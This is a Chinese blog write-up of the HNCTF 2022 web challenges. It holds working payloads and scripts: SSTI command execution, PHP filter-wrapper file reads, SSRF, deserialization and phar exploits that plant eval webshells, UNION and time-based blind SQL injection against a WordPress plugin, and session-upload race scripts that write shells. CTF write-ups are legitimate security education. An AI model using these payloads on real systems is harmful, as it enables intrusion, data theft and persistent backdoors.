-
【Web】HNCTF 2022 题解(全)
目录
Week1
Interesting_include
?filter=php://filter/convert.base64-encode/resource=flag.php
base64解码拿到flag
2048
看js文件,搜索关键词alert
复制在控制台输出直接弹窗
easy_html
提示访问./f14g.php
访问
改max-length
然后随便输入一串手机号直接拿到flag
What is Web
一眼顶针,藏flag鉴定为烂
Interesting_http
按要求传参就可
easy_upload
随便上传个马
写入,命令执行拿flag
Week2
ez_SSTI
测出ssti注入点传参是?name=
payload
?name={{config.__init__.__globals__[%27__builtins__%27][%27eval%27]("__import__(%27os%27).popen(%27cat%20f*%27).read()")}}
easy_include
直接打日志包含写一句话木马
ez_ssrf
先访问/index.php
直接访问/flag.php
就是ssrf往flag.php发请求
- GET /flag.php HTTP/1.1
- Host: 127.0.0.1
- Connection: Close
base64编码得
R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=最终payload:
?host=127.0.0.1&port=80&data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=
Canyource
payload:
?code=eval(end(current(get_defined_vars())));&Z3r4y=system('tac flag.php');右键查看源码拿到flag
easy_unser
一眼顶针,鉴定为烂
就是一个wakeup的绕过,然后读文件用伪协议
注意高版本php不能直接把private改public
exp:
- class body{
- private $want="php://filter/convert.base64-encode/resource=f14g.php";
- private $todonothing="0x401";
- }
- $a=new body();
- echo urlencode(preg_replace("/:2:{/",":3:{",serialize($a)));
base64解码拿到flag
easy_sql
简单fuzz一下,ban了这么些,一眼顶针,无列名注入
因为注释被ban了,所以考虑闭合的方式来注入
SQL注入绕过入门总结篇 - FreeBuf网络安全行业门户
- 0'/**/union/**/select/**/1,2,database()/**/where/**/'1
- Here is your want!
- ctf
- 0'/**/union/**/select/**/1,2,group_concat(database_name)/**/from/**/mysql.innodb_table_stats/**/where/**/'1
- Here is your want!
- ctf,ctftraining,ctftraining,ctftraining,mysql
- 0'/**/union/**/select/**/1,2,group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/'1
- Here is your want!
- ccctttfff,flag,news,users,gtid_slave_pos
- 0'/**/union/**/select/**/1,2,group_concat(`1`)/**/from/**/(select/**/1/**/union/**/select/**/*/**/from/**/ctftraining.flag)xxx/**/union/**/select/**/1,2,3/**/||'1
- Here is your want!
- 1,NSSCTF{cc299b0b-fd6d-4e3a-b5e4-040d8c9d7dde}
ohmywordpress
一直点进去就行
右键查看源码,得知WordPress版本为6.0.2
- import requests
- import time
- url = "http://node5.anna.nssctf.cn:20313/wp-admin/admin-ajax.php"
- result = ""
- for i in range(1, 100):
- length = len(result)
- for o in range(32, 128):
- data = {
- "action": "qcopd_upvote_action",
- # "post_id": f"(SELECT 3 FROM (select if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))={o},sleep(3),0))enz)",
- # "post_id": f"(SELECT 3 FROM (select if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=substr((select group_concat(schema_name) from information_schema.schemata),26,11)),{i},1))={o},sleep(3),0))enz)",
- "post_id": f"(SELECT 3 FROM (select if(ascii(substr((select group_concat(a) from (select 1 as a union select * from ctftraining.flag)b),{i},1))={o},sleep(3),0))enz)",
- }
- time1 = time.time()
- res = requests.post(url, data=data)
- time2 = time.time()
- if time2 - time1 > 3:
- result += chr(o)
- print(result)
- break
- if len(result) == length:
- break
跑出来flag
Week3
ssssti
拿fengjing梭
或者也可以手打
?name={{lipsum[request.values.a][request.values.b][request.values.c](request.values.d).popen(request.values.e).read()}}&a=__globals__&b=__builtins__&c=__import__&d=os&e=cat /flagFun_php
一眼顶针,鉴定为烂
payload:
- ?user=114514a&mySaid=QNKCDZO&myHeart=240610708&hn=hn&%E2%80%AE%E2%81%A6LAG%E2%81%A9%E2%81%A6ctf=%E2%80%AE%E2%81%A6+Flag%21%E2%81%A9%E2%81%A6ctf
- data%5B%5D=Probiusa&verify%5B%5D=1&want=fl*
右键查看源码拿到flag
ez_phar
访问/upload.php
exp:
- class Flag{
- public $code;
- }
- $o = new Flag();
- $o->code = 'eval($_GET["a"]);';
- @unlink("phar.phar");
- $phar = new Phar("phar.phar"); //后缀名必须为phar
- $phar->startBuffering();
- $phar->setStub(""); //设置stub
- $phar->setMetadata($o); //将自定义的meta-data存入manifest
- $phar->addFromString("test.txt", "test"); //添加要压缩的文件
- //签名自动计算
- $phar->stopBuffering();
- ?>
上传恶意phar文件
然后再phar伪协议配合file_exists触发phar反序列化
QAQ_1inclu4e
文件包含的参数是QAQ
过滤了php . log flag :,选择打临时session文件包含
需要条件竞争的方式
- import requests
- import io
- import threading
- url = "http://node5.anna.nssctf.cn:21880/"
- sessid = "Z3"
- def write(session):
- filebytes = io.BytesIO(b'aaaa' * 1024 * 50)
- while True:
- res = session.post(url,
- data={
- 'PHP_SESSION_UPLOAD_PROGRESS': ""
- },
- cookies={
- 'PHPSESSID': sessid
- },
- files={
- 'file': ('Z3.txt', filebytes)
- }
- )
- def read(session):
- while True:
- res = session.post(url+"?QAQ=/tmp/sess_"+sessid,
- data={
- "1":"file_put_contents('shell.php', '');"
- },
- cookies={
- "PHPSESSID":sessid
- }
- )
- if 'Z3.txt' in res.text:
- print("Success!")
- print(res.text)
- break
- else:
- print("Retry")
- if __name__ == "__main__":
- event = threading.Event()
- with requests.session() as session:
- for i in range(5):
- threading.Thread(target=write, args=(session,)).start()
- for i in range(5):
- threading.Thread(target=read, args=(session,)).start()
- event.set()
回显success,成功写马
连蚁剑,flag在/var目录下
logjjjjlogjjjj
擦,一眼顶针,这不是Vulfocus log4j2-rce靶机
log4j打JNDI
可以看看我的这篇文章,第二题就是原题
Week4
pop子和pipi美
评价为烂
?pop_EP=ep683045
exp:
- error_reporting(0);
- //flag is in f14g.php
- class Popuko {
- private $No_893;
- public function __construct(){
- $this->No_893 = "php://filter/convert.base64-encode/resource=f14g.php";
- }
- }
- class Pipimi{
- public $pipi;
- public function __construct(){
- $this->p = new Popuko();
- }
- }
- class Goodsisters{
- public $kiminonawa,$str;
- public function __construct(){
- $this->str = new Pipimi();
- }
- }
- $a = new Goodsisters();
- $a->kiminonawa = new Goodsisters();
- $ser = serialize($a);
- echo urlencode($ser);
base64解码拿到flag
fun_sql
payload:
?uname=1' union select 1,load_file(concat('/var/www/html/fla','g.php')),3; --+
unf1ni3hed_web3he1
302跳转bp抓包拦截
访问/Rea1web3he11.php
访问/t00llll.php
?include_=php://filter/read=convert.base64-encode/resource=Rea1web3he11.phpbase64解码后读到Rea1web3he11.php源码
- error_reporting(0);
- ini_set('session.serialize_handler', 'php');
- session_start();
- echo "y0u_m4ybe_n3ed_s0me_t00llll_t0_u4_1t!"."
"; - class webshell{
- public $caution;
- public $execution;
- function __construct(){
- $this -> caution = new caution();
- }
- function __destruct(){
- $this -> caution -> world_execute();
- }
- function exec(){
- @eval($execution);
- }
- }
- class caution{
- function world_execute(){
- echo "Webshell初&#%始*$%&^化,$))(&*(%#^**ERROR**#@$()"."
"; - }
- }
- class execution{
- public $cmd;
- function __construct(){
- $this -> cmd = 'echo "即将执行命令:".$cmd;';
- }
- function world_execute(){
- eval($this -> cmd);
- }
- }
- ?>
一眼session反序列化
【文件包含&条件竞争】详解如何利用session.upload_progress文件包含进行RCE - 蚁景网安实验室
exp:
- class webshell{
- public $caution;
- }
- class execution{
- public $cmd;
- }
- $b = new execution();
- $b->cmd = 'system("cat /secret/flag");';
- $a = new webshell();
- $a->caution = $b;
- echo '|'.serialize($a);
- import threading
- import requests
- url = 'http://node5.anna.nssctf.cn:27540/Rea1web3he11.php'
- flag = 'xxx'
- cmd = "system('cat /secret/flag');"
- payload = r'|O:8:"webshell":1:{s:7:"caution";O:9:"execution":1:{s:3:"cmd";s:' + str(len(cmd)) + ':"' + cmd + '";}}'
- def upload():
- files = [
- ('file', ('xx.txt', 'xxx'*10240)),
- ]
- data = {'PHP_SESSION_UPLOAD_PROGRESS': payload}
- while True:
- res = requests.post(url, data=data, files=files, cookies={'PHPSESSID': flag})
- print('upload',res.text)
- def write():
- while True:
- res = requests.get(url, cookies={'PHPSESSID': flag})
- print('write',res.text)
- for i in range(10):
- t1 = threading.Thread(target=upload)
- t2 = threading.Thread(target=write)
- t1.start()
- t2.start()
跑出flag
-
相关阅读:
TensorFlow 介绍 及其简单应用 附实例
数据结构笔记——树和图(王道408)(持续更新)
考研政治---马克思主义基本原理概论---认识论
计算机网络学习笔记(三):数据链路层(待更新)
前端常见的设计模式
Python基础之综合练习一
linux服务 宝塔控制面板,宝塔面板打不开,ssh可以链接,输入bt命令没有反应 linux 重启宝塔服务器命令
想让 c++ 的 static 成员具有多态性
化学制品制造业智慧供应商管理系统深度挖掘供应商管理领域,提升供应链协同
使用selenium调用firefox提示Profile Missing的问题解决
- 原文地址:https://blog.csdn.net/uuzeray/article/details/138013356
